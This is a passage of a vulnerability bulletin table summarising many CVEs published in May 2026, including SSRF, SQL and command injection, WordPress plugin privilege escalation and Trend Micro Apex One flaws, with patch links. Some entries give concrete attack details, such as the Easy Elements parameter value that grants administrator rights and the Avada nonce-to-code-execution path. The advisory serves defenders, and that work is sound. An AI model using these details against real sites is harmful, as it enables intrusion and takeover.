| tenable--Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the remote_url parameter in the remote directory scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) when running in server mode. An unauthenticated remote attacker can supply an attacker-controlled HTTP URL as remote_url with remote_type set to "http". The URL is passed directly to hashicorp/go-getter (v1.7.5) without validation. Go-getter's HttpGetter supports the X-Terraform-Get response header, allowing the attacker's server to redirect the download to a file:// URL, enabling local file read. Additionally, HttpGetter has Netrc set to true, causing it to read ~/.netrc and send stored credentials to attacker-controlled hostnames. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47357 |
| tenable--Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via external URL resolution in uploaded IaC templates when running in server mode. When Terrascan parses uploaded ARM templates or CloudFormation templates, it resolves external URLs referenced within those templates via hashicorp/go-getter with all default detectors enabled, including FileDetector. An unauthenticated remote attacker can upload an ARM template containing a templateLink.uri or parametersLink.uri field, or a CloudFormation template containing an AWS::CloudFormation::Stack TemplateURL field, pointing to an attacker-controlled URL. Terrascan will fetch the attacker-controlled URL server-side. Unlike SSRF via the remote scan endpoint, file:// URLs are directly usable without requiring an X-Terraform-Get redirect, enabling local file read. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47358 |
| Tenda--F456 | A security vulnerability has been detected in Tenda F456 1.0.0.5. This affects the function frmL7ImForm of the file /goform/L7Im. The manipulation of the argument page leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-05-24 | 8.8 | CVE-2026-9389 |
| themefusion--Avada (Fusion) Builder | The Avada Builder (fusion-builder) plugin for WordPress is vulnerable to Unauthenticated Remote Code Execution via PHP Function Injection in versions up to and including 3.15.2. This is due to the `wp_conditional_tags` case in `Fusion_Builder_Conditional_Render_Helper::get_value()` passing attacker-controlled values from a base64-decoded JSON blob directly to `call_user_func()` without any allowlist validation. This is exploitable by unauthenticated attackers through the `fusion_get_widget_markup` AJAX endpoint, which is registered for non-privileged (unauthenticated) users via `wp_ajax_nopriv_fusion_get_widget_markup`. The endpoint is protected only by a nonce (`fusion_load_nonce`), but this nonce is generated for user ID 0 and is deterministically exposed in the JavaScript output of any public-facing page containing a Post Cards (`[fusion_post_cards]`) or Table of Contents (`[fusion_table_of_contents]`) element. This makes it possible for unauthenticated attackers to execute arbitrary code on affected sites. | 2026-05-21 | 9.8 | CVE-2026-6279 |
| themeum--Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki - Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation and missing capability check in the 'downloadZIP' function in all versions up to, and including, 6.0.6. This makes it possible for unauthenticated attackers to read and delete arbitrary files limited in the WordPress uploads base directory. | 2026-05-19 | 7.5 | CVE-2026-8073 |
| themewant--Easy Elements for Elementor Addons & Website Templates | The Easy Elements for Elementor - Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2026-05-20 | 9.8 | CVE-2026-7284 |
| themewant--Easy Elements for Elementor Addons & Website Templates | The Easy Elements for Elementor - Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.5 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user's meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login/Register widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request. | 2026-05-22 | 8.8 | CVE-2026-9018 |
| TONNET--TPR7308 | E-LAN Hybrid Recording System developed by TONNET has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2026-05-20 | 7.5 | CVE-2026-9003 |
| Totolink--A8000RU | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument ip results in os command injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-24 | 9.8 | CVE-2026-9384 |
| Totolink--A8000RU | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument command causes os command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-24 | 9.8 | CVE-2026-9385 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument lang leads to os command injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-24 | 9.8 | CVE-2026-9386 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setUpgradeFW of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument resetFlags results in os command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9387 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setScheduleCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument mode can lead to os command injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9388 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setDdnsCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument provider leads to os command injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2026-05-24 | 9.8 | CVE-2026-9404 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setGameSpeedCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument enable results in os command injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9405 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setRemoteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument enable can lead to os command injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9406 |
| Totolink--A8000RU | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. Affected by this vulnerability is the function setFirewallType of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument firewallType leads to os command injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. | 2026-05-24 | 9.8 | CVE-2026-9407 |
| Trend Micro, Inc.--TrendAI Apex One | A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console�s IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. | 2026-05-21 | 9.8 | CVE-2025-71210 |
| Trend Micro, Inc.--TrendAI Apex One | A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. This vulnerability is similar in scope to CVE-2025-71210 but affects a different executable. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console�s IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. | 2026-05-21 | 9.8 | CVE-2025-71211 |
| Trend Micro, Inc.--TrendAI Apex One | A link following vulnerability in the Trend Micro Apex One scan engine could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2025-71212 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation error vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2025-71213 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34927 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different named pipe communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34928 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different inter-process communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34929 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different process protection mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34930 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45207 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45206 |
| Trend Micro, Inc.--TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45206 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45207 |
| Trend Micro, Inc.--TrendAI Apex One | A time-of-check time-of-use vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45208 |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Clipper API in Trilium Desktop (v0.101.3) allows full authentication bypass when running in an Electron environment. When Trilium detects an Electron environment, it explicitly disables authentication middleware for the Clipper API, exposing endpoints such as /api/clipper/notes to the network with no password, API token, or CSRF protection. An attacker on a shared network (for example, a corporate LAN or public Wi-Fi) can scan for open high-range ports using a tool like nmap, since Trilium often binds to ports such as 37840. Once a candidate port is found, an unauthenticated request to the Clipper handshake endpoint, which also bypasses authentication, confirms a Trilium instance by returning the application name and protocol version. This facilitates unauthorized data access, phishing, and local system compromise. The issue has been fixed in version 0.102.2. | 2026-05-20 | 8.6 | CVE-2026-39310 |
| twigphp--Twig | Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass vulnerability when using a SourcePolicyInterface that allows attackers with template rendering capabilities to pass arbitrary PHP callables to sort, filter, map, and reduce filters. Attackers can exploit the runtime check that fails to use the current template source to bypass sandbox restrictions and execute arbitrary code when the sandbox is enabled through a source policy rather than globally. | 2026-05-20 | 8.8 | CVE-2026-24425 |
| Tyler Technologies--TID-L | Tyler Identity Local (TID-L) uses documented, default administrative credentials. Users are not required to change the credentials before deployment. TID-L has not been distributed since December 2020, and has not been supported since 2021. | 2026-05-19 | 9.8 | CVE-2026-44159 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system. | 2026-05-22 | 10 | CVE-2026-34908 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account. | 2026-05-22 | 10 | CVE-2026-34909 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. | 2026-05-22 | 10 | CVE-2026-34910 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and high privileges could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. | 2026-05-22 | 9.1 | CVE-2026-33000 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and low privileges could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to obtain sensitive information. | 2026-05-22 | 7.7 | CVE-2026-34911 |
| ultimate-form-builder-lite--Ultimate Form Builder Lite | WordPress Ultimate Form Builder Lite plugin version 1.3.7 and below contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the entry_id POST parameter. Attackers can send POST requests to the admin-ajax.php endpoint with the ufbl_get_entry_detail_action action to extract, modify, or escalate privileges within the WordPress database. | 2026-05-23 | 7.1 | CVE-2018-25352 |
| UserSpice--userSpice | userSpice 4.3.24 contains a username enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by sending POST requests to the existingUsernameCheck.php endpoint. Attackers can submit usernames and analyze response text for the 'taken' string to identify existing accounts in the system. | 2026-05-23 | 9.8 | CVE-2018-25350 |
| web-dorado--Contact Form Maker | WordPress Contact Form Maker Plugin 1.12.20 contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries through the FormMakerSQLMapping and generete_csv_fmc AJAX actions. Attackers can inject malicious SQL code via the 'name' and 'search_labels' parameters to extract sensitive database information or escalate privileges. | 2026-05-23 | 7.1 | CVE-2018-25347 |
| webdriverio--webdriverio | WebdriverIO is a test automation framework for unit, e2e and component testing using WebDriver, WebDriver BiDi and Appium. Versions below 9.24.0 contain a command injection vulnerability leading to remote code execution (RCE) in test orchestration. Git permits branch names containing shell metacharacters, and getGitMetadataForAISelection() interpolates these names directly into execSync() calls without sanitization. An attacker can exploit this by supplying a malicious repository (via testOrchestrationOptions.runSmartSelection.source, or the current directory if unset) whose branch name carries a payload, causing the shell to execute arbitrary code. This enables remote code execution on CI/CD servers and developer machines, leading to credential and secret disclosure, source code and SSH key exfiltration, system compromise, and supply chain attacks via tampered build artifacts. The issue has been fixed in version 9.24.0. | 2026-05-18 | 9.8 | CVE-2026-25244 |
| weDevs--WP ERP Pro | The WP ERP Pro plugin for WordPress is vulnerable to SQL Injection via the 'search_key' parameter in all versions up to, and including, 1.5.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-22 | 7.5 | CVE-2026-4834 |
| windmill-labs--windmill | Windmill prior to 1.703.2 contains an incorrect default permissions vulnerability in nsjail sandbox configuration files where /etc is bind-mounted without read-write restrictions, allowing authenticated users to write arbitrary entries to /etc/hosts, /etc/resolv.conf, and /etc/ssl/certs/ca-certificates.crt from within script execution sandboxes. Attackers can exploit persistent poisoned entries across all subsequent script executions on the same worker pod to redirect hostnames, intercept DNS queries, perform transparent HTTPS man-in-the-middle attacks, and intercept WM_TOKEN JWTs to gain workspace-admin access to other users' workspaces. | 2026-05-19 | 8.1 | CVE-2026-47107 |
| Wishlist Member--Wishlist Member | The WishList Member plugin for WordPress is vulnerable to Privilege Escalation via Missing Authorization in versions up to and including 3.30.1. This is due to the missing capability and nonce check in the ajax_get_screen() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to supply an arbitrary admin screen identifier via the data[url] parameter, causing the plugin to load and execute the administrative API configuration template without authorization. The rendered HTML, which contains the plugin's plaintext REST API Secret Key, is returned directly to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6419 |
| Wishlist Member--Wishlist Member | The WishList Member plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Disclosure and Privilege Escalation in versions up to and including 3.30.1. This is due to the missing capability checks in the 'export_settings' function. This function returns the REST API Secret Key to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6895 |
| Wishlist Member--Wishlist Member | The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'WishListMember\Features\Team_Accounts::save_settings' function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options, includes the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6897 |
| Wishlist Member--Wishlist Member | The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'WishListMember3_Hooks::generate_api_key' function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6898 |
| woocommerce--WooCommerce PayPal Payments | The WooCommerce PayPal Payments plugin for WordPress is vulnerable to unauthorized order manipulation and information disclosure due to missing authorization checks on the `ppc-create-order` and `ppc-get-order` WC-AJAX endpoints in all versions up to, and including, 4.0.1. The `ppc-create-order` endpoint accepts an arbitrary WooCommerce order ID in the `pay-now` context without validating order ownership, allowing attackers to create PayPal orders for any WC order and write PayPal metadata to it. The `ppc-get-order` endpoint returns full PayPal order details for any PayPal order ID without binding to the requester's session. This makes it possible for unauthenticated attackers to chain these endpoints to manipulate other customers' order payment flows and exfiltrate sensitive order details (payer information, shipping data) by creating a PayPal order for a victim's WC order and then retrieving the PayPal order data. | 2026-05-23 | 8.2 | CVE-2026-9284 |
| Wp Directory Kit--WP Directory Kit | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.0. | 2026-05-21 | 9.3 | CVE-2026-39531 |
| WP Swings--Gift Cards For WooCommerce Pro | Unrestricted Upload of File with Dangerous Type vulnerability in WP Swings Gift Cards For WooCommerce Pro allows Using Malicious Files. This issue affects Gift Cards For WooCommerce Pro: from n/a through 4.2.6. | 2026-05-20 | 10 | CVE-2026-45444 |
| yiisoft--yii2 | Yii 2 is a PHP application framework. Versions 2.0.54 and prior contain flawed logic in the core view rendering method View::renderPhpFile() that leads to Local File Inclusion. The function calls extract($_params_, EXTR_OVERWRITE) before the require statement that loads the view file. As a result, a caller-controlled _file_ key in the $params array overwrites the internal local variable specifying which file to include, potentially enabling RCE if an attacker can write PHP files through a separate primitive, as well as information disclosure. This issue has been fixed in version 2.0.55. | 2026-05-20 | 7.4 | CVE-2026-39850 |
| YITH--YITH WooCommerce Product Add-Ons | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in YITH YITH WooCommerce Product Add-Ons allows Blind SQL Injection. This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.29.0. | 2026-05-20 | 7.6 | CVE-2026-42383 |
| ZKTeco--SSC335-GC2063-Face-0b77 Solution Camera | An undocumented configuration export port is accessible on some models of ZKTeco CCTV cameras. This port does not require authentication and exposes critical information about the camera such as open services and camera account credentials. | 2026-05-20 | 9.1 | CVE-2026-8598 |
| Zohocorp--ManageEngine ADSelfService Plus | Zohocorp ManageEngine ADSelfService Plus version before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to Authenticated Remote code execution in the agent machines due to the bug in the 3rd party dependency. | 2026-05-21 | 8.4 | CVE-2026-2740 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 546669204--vps-inventory-monitoring | A vulnerability was determined in 546669204 vps-inventory-monitoring up to 98c00b370668c96ae75e91c15548d9ea113652d9. This issue affects the function eval of the file app/index/command/VpsTest.php of the component VpsTest Console. Executing a manipulation of the argument vf can lead to code injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-23 | 6.3 | CVE-2026-9302 | VDB-365249 | 546669204 vps-inventory-monitoring VpsTest Console VpsTest.php eval code injection VDB-365249 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811843 | 546669204 vps-inventory-monitoring <=98c00b3 Code Injection / Eval Injection https://github.com/546669204/vps-inventory-monitoring/issues/36 https://github.com/dntyfate/cve/issues/2 https://github.com/546669204/vps-inventory-monitoring/ |
| ADD-ONS.ORG--PDF for Elementor Forms + Drag And Drop Template Builder | Missing Authorization vulnerability in ADD-ONS.ORG PDF for Elementor Forms + Drag And Drop Template Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through 5.5.1. | 2026-05-20 | 5 | CVE-2026-45443 | https://patchstack.com/database/wordpress/plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-5-5-1-broken-access-control-vulnerability?_s_id=cve |
| askywhale--Games Catalog | The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the gc_crud() function which handles the delete action (action=delete) via a GET request without any wp_verify_nonce() / check_admin_referer() call. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the associated WordPress post created for the game) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8418 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0888cda8-63ca-44f6-a3eb-765c14a7e6c7?source=cve https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L94 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L94 https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L31 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L31 https://plugins.trac.wordpress.org/browser/game-catalog/trunk/games-catalog.php#L96 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/games-catalog.php#L96 |
| baptisteArno--typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the getResultLogs API endpoint authorizes the caller against the provided typebotId but fetches logs solely by resultId without verifying that the result belongs to the authorized typebot, leading to IDOR. An authenticated attacker can supply their own typebotId alongside any victim's resultId to read execution logs from other workspaces, leaking sensitive data including HTTP response bodies, AI model outputs, and webhook payloads. Every other result-scoped endpoint in the same router properly validates that the resultId belongs to the authorized typebotId. This confirms the missing check is an oversight, not a design choice. This issue has been fixed in version 3.15.2. | 2026-05-22 | 6.5 | CVE-2026-28444 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-c63p-mqx5-75r7 https://github.com/baptisteArno/typebot.io/commit/d82b2d47c86ae614a08d4073c669ca64442faff2 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2, the getLinkedTypebots API endpoint returns full bot definitions to any authenticated user who references a target bot ID in a Typebot Link block, regardless of workspace ownership, leading to IDOR. The authorization check uses Array.filter() with an async callback - since filter() is synchronous, the callback always returns a truthy Promise, so the access control predicate is never actually evaluated. Any authenticated Typebot user can read the full definition of any other workspace's private bots, including: all conversation blocks and logic flow, variable values embedded in the bot (credentials, API keys, PII), webhook URLs and integration configurations. This issue has been fixed in version 3.16.0. | 2026-05-22 | 6.5 | CVE-2026-39966 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-3fr5-999r-84qj https://github.com/baptisteArno/typebot.io/commit/b9530a089b43bfa6e79e3ff9cbfab921ce832f45 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions 3.16.0 and prior, the WhatsApp Cloud API webhook endpoint (POST /v1/workspaces/{workspaceId}/whatsapp/{credentialsId}/webhook) does not verify the x-hub-signature-256 HMAC signature included by Meta in every webhook delivery. The webhook URL exposes both workspaceId and credentialsId as path parameters, which are logged in web server access logs, visible in Meta's webhook configuration dashboard, and potentially shared when configuring integrations. This allows any unauthenticated attacker to send spoofed webhook messages to trigger bot flows, consume API resources, and interact with external services using the workspace owner's credentials. The issue has been fixed in version 3.17.0. | 2026-05-22 | 6.5 | CVE-2026-39969 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-8vqp-r5w7-v47f https://github.com/baptisteArno/typebot.io/releases/tag/v3.17.0 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions prior to 3.16.0, the Typebot viewer (packages/embeds/js) renders anchor tags from rich text bubble content without filtering the javascript: URI scheme. A bot author can set a link URL to javascript:PAYLOAD, which executes in the visitor's browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker's JavaScript runs in the host page's origin and can exfiltrate cookies and session tokens. This can result in any authenticated Typebot user (including those on the free tier) being able to create a bot with this payload. Shared bots are publicly accessible - no victim authentication is required. This issue has been resolved in version 3.16.0. | 2026-05-22 | 5.4 | CVE-2026-39964 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-hqmv-v56g-4m47 https://github.com/baptisteArno/typebot.io/commit/2c3fc7267a5e1529ba4b1a2ab4f1edb3e3b8990b https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Behance--Smartshop | Smartshop 1 contains a cross-site request forgery vulnerability that allows attackers to modify user profiles by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting editprofile.php with hidden fields for email and password parameters that execute automatically when visited by an authenticated admin user. | 2026-05-23 | 4.3 | CVE-2018-25343 | ExploitDB-44824 Official Product Homepage Product Reference VulnCheck Advisory: Smartshop 1 Cross-Site Request Forgery via editprofile.php |
| bentoml--BentoML | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.38 and prior, the build packaging workflow follows attacker-controlled symlinks inside the build context and copies the referenced file contents into the generated Bento artifact. If a victim builds an untrusted repository or other attacker-supplied build context, the attacker can place a symlink such as loot.txt -> /tmp/outside-marker.txt or a link to a more sensitive local file. When bentoml build runs, BentoML dereferences the symlink and packages the target file contents into the Bento. The leaked file can then propagate further through export, push, or containerization workflows. An attacker can exfiltrate local files from the build host into the Bento artifact, exposing secrets such as cloud credentials, SSH keys, API tokens, environment files, or other sensitive local configurations. Because Bento artifacts are commonly exported, uploaded, stored, or containerized after build, the leaked file contents can spread beyond the original build machine. This issue has been fixed in version 1.4.39. | 2026-05-22 | 5.5 | CVE-2026-40610 | https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv https://github.com/bentoml/BentoML/commit/5fb7cd41f92e2a56b45391284cf15b9ac9963a1f https://github.com/bentoml/BentoML/releases/tag/v1.4.39 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions prior to 5.0.10 and 6.0.0 through 6.0.2 contain a spreadsheet (CSV/formula) injection vulnerability. User-controlled data in spreadsheet exports is not sanitized before being written to the output file, which can cause spreadsheet applications to interpret crafted values as formulas or macros when the file is opened. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by avoiding opening exported RT spreadsheet files directly in spreadsheet applications when the data may contain untrusted user input. | 2026-05-22 | 4.6 | CVE-2026-41073 | https://github.com/bestpractical/rt/security/advisories/GHSA-6x92-7v65-7m3r https://github.com/bestpractical/rt/releases/tag/rt-5.0.10 https://github.com/bestpractical/rt/releases/tag/rt-6.0.3 |
